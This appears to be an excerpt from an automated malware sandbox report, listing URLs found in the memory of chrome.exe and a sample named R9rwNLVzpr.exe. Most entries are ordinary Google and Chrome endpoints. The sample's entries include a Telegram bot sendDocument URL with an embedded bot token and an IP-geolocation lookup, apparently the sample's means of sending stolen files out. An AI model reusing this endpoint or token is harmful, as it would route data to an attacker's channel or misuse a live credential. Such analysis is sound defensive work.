Source: chrome.exe, 00000006.00000002.1471335823.000017D400E94000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 00000006.00000002.1444382278.000017D400450000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/Logout?source=ChromiumBrowser&continue=https://accounts.google.com/chrom
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000006.00000002.1442815354.000017D4000C5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 00000006.00000002.1471937234.000017D40108A000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1324535784.000017D40108C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 00000006.00000002.1471937234.000017D40108A000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1324535784.000017D40108C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/samlredirect
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 00000006.00000002.1445612446.000017D400740000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com:443
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://acxiom.com
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://adsmeasurement.com
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://adtrafficquality.google
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://apex-football.com
Source: R9rwNLVzpr.exe, 00000001.00000002.1584357920.00000000034E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.tele
Source: R9rwNLVzpr.exe, 00000001.00000002.1584357920.00000000034E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: R9rwNLVzpr.exe, 00000001.00000002.1584357920.00000000034E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: R9rwNLVzpr.exe, 00000001.00000002.1584357920.00000000034E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7604180600:AAHwr2u1ZveiHzQQ_yVoPYP2QNFw1punco0/sendDocument
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://atomex.net
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://audienceproject.com
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beaconmax.com
Source: chrome.exe, 00000006.00000002.1448980001.000017D400990000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/
Source: chrome.exe, 00000006.00000002.1474277586.000017D401560000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1444955697.000017D4005A4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1474306449.000017D401570000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1474336202.000017D4015A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com
Source: chrome.exe, 00000006.00000002.1449969898.000017D400B2C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1451762911.000017D400CA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473659400.000017D401438000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 00000006.00000002.1458369665.000017D400DE8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: chrome.exe, 00000006.00000002.1458369665.000017D400DE8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: chrome.exe, 00000006.00000002.1458369665.000017D400DE8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 00000006.00000002.1442942072.000017D4000FC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000006.00000002.1444120355.000017D40033C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore/category/collection/chrome_color_themes?hl=$
Source: chrome.exe, 00000006.00000002.1408070259.0000025707AD0000.00000002.00000001.00040000.00000010.sdmp	String found in binary or memory: https://chrome.google.com/webstore/category/extensions
Source: chrome.exe, 00000006.00000002.1434743725.000002570B307000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000006.00000002.1408070259.0000025707AD0000.00000002.00000001.00040000.00000010.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en&category=theme81https://myactivity.google.com/myactivity/?u
Source: chrome.exe, 00000006.00000002.1408070259.0000025707AD0000.00000002.00000001.00040000.00000010.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enCtrl$1
Source: chrome.exe, 00000006.00000002.1472579155.000017D4011C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1472372477.000017D401158000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1442942072.000017D4000FC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000006.00000002.1408070259.0000025707AD0000.00000002.00000001.00040000.00000010.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherEnabled
Source: chrome.exe, 00000006.00000002.1408070259.0000025707AD0000.00000002.00000001.00040000.00000010.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl
Source: chrome.exe, 00000006.00000002.1408070259.0000025707AD0000.00000002.00000001.00040000.00000010.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl
Source: chrome.exe, 00000006.00000002.1408070259.0000025707AD0000.00000002.00000001.00040000.00000010.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist
Source: chrome.exe, 00000006.00000002.1408070259.0000025707AD0000.00000002.00000001.00040000.00000010.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlList
Source: chrome.exe, 00000006.00000002.1408070259.0000025707AD0000.00000002.00000001.00040000.00000010.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist
Source: chrome.exe, 00000006.00000003.1311464311.000017D000504000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000006.00000002.1442304117.000017D000630000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1310480783.000017D000404000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000006.00000003.1311464311.000017D000504000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000006.00000002.1442304117.000017D000630000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1310480783.000017D000404000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000006.00000003.1310792094.000017D0004CC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000006.00000002.1442304117.000017D000630000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1310480783.000017D000404000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000006.00000002.1446850569.000017D400804000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromemodelexecution-pa.googleapis.com/v1:Execute?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNh
Source: chrome.exe, 00000006.00000002.1446850569.000017D400804000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromemodelquality-pa.googleapis.com/v1:LogAiData?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNh
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000006.00000002.1408070259.0000025707AD0000.00000002.00000001.00040000.00000010.sdmp	String found in binary or memory: https://chromestatus.com/features#browsers.chrome.status%3A%22Deprecated%22
Source: chrome.exe, 00000006.00000002.1443417891.000017D4001D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000006.00000002.1449265762.000017D400A04000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/category/extensions
Source: chrome.exe, 00000006.00000002.1449265762.000017D400A04000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/category/themes
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/
Source: R9rwNLVzpr.exe, 00000001.00000002.1584357920.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1285911331.00006298000DC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000006.00000002.1443323164.000017D4001A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1443417891.000017D4001D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1449034116.000017D4009B8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1449034116.000017D4009E2000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1447597781.000017D400888000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000006.00000002.1442815354.000017D4000C5000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1454386505.000017D400D98000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod
Source: chrome.exe, 00000006.00000002.1446905028.000017D400815000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 00000006.00000002.1446905028.000017D400815000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 00000006.00000002.1446905028.000017D400815000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 00000006.00000002.1449034116.000017D4009B8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1471554093.000017D400F2C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=134
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://creative-serving.com
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dailymotion.com
Source: chrome.exe, 00000006.00000002.1472912058.000017D401288000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473108902.000017D401308000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/
Source: chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473108902.000017D401308000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473341101.000017D40137C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000006.00000002.1472693291.000017D401204000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 00000006.00000002.1442304117.000017D000630000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1310480783.000017D000404000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview2K
Source: chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1472799030.000017D401244000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000006.00000002.1449969898.000017D400B2C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1451762911.000017D400CA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473659400.000017D401438000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000006.00000002.1449969898.000017D400B2C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1451762911.000017D400CA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473659400.000017D401438000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000006.00000002.1472912058.000017D401288000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473108902.000017D401308000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/
Source: chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473659400.000017D401438000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1472799030.000017D401244000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 00000006.00000002.1473564721.000017D401404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1472799030.000017D401244000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000006.00000002.1449969898.000017D400B2C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1451762911.000017D400CA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473659400.000017D401438000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000006.00000002.1472912058.000017D401288000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473108902.000017D401308000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/
Source: chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473659400.000017D401438000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1472799030.000017D401244000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1472799030.000017D401244000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 00000006.00000002.1449969898.000017D400B2C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1451762911.000017D400CA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473659400.000017D401438000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000006.00000002.1472912058.000017D401288000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473108902.000017D401308000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 00000006.00000002.1472912058.000017D401288000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473108902.000017D401308000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473659400.000017D401438000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000006.00000002.1472912058.000017D401288000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2policy
Source: chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1472799030.000017D401244000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://eloan.co.jp
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://explorefledge.com
Source: chrome.exe, 00000006.00000002.1475179115.000017D4016B4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1475179115.000017D4016E0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1471937234.000017D401028000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://fonts.google.com/icons?selected=Material
Source: chrome.exe, 00000006.00000002.1458369665.000017D400DE8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: chrome.exe, 00000006.00000002.1442304117.000017D000630000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1310480783.000017D000404000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/glic/intro?20
Source: chrome.exe, 00000006.00000002.1442304117.000017D000630000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1310480783.000017D000404000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/glic2
Source: R9rwNLVzpr.exe, 00000001.00000002.1584357920.000000000342E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://get.geojs.io
Source: R9rwNLVzpr.exe, 00000001.00000002.1584357920.000000000342E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://get.geojs.io/v1/ip/geo.json
Source: chrome.exe, 00000006.00000003.1310792094.000017D0004CC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000006.00000002.1442304117.000017D000630000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1310480783.000017D000404000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000006.00000003.1310792094.000017D0004CC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000006.00000003.1310792094.000017D0004CC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000006.00000002.1442304117.000017D000630000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1310480783.000017D000404000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000006.00000003.1310792094.000017D0004CC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
Source: chrome.exe, 00000006.00000003.1310792094.000017D0004CC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Pre
Source: chrome.exe, 00000006.00000003.1310792094.000017D0004CC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 00000006.00000002.1442815354.000017D4000C5000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1442464765.000017D400004000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: chrome.exe, 00000006.00000002.1448893801.000017D400974000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://googleusercontent.com/
Source: chrome.exe, 00000006.00000002.1442304117.000017D000630000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1310480783.000017D000404000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gunosy.com
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ingereck.net
Source: chrome.exe, 00000006.00000002.1453899591.000017D400D78000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1475680789.000017D40175C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1450718698.000017D400BE4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://kompaspublishing.nl
Source: chrome.exe, 00000006.00000002.1444955697.000017D4005A4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1474336202.000017D4015A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/gen204
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000006.00000002.1472912058.000017D401288000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473108902.000017D401308000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473659400.000017D401438000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/chat/
Source: chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/chat/:
Source: chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/chat/J
Source: chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1472799030.000017D401244000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/chat/download?usp=chrome_default
Source: chrome.exe, 00000006.00000002.1472912058.000017D401288000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473108902.000017D401308000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/
Source: chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/:
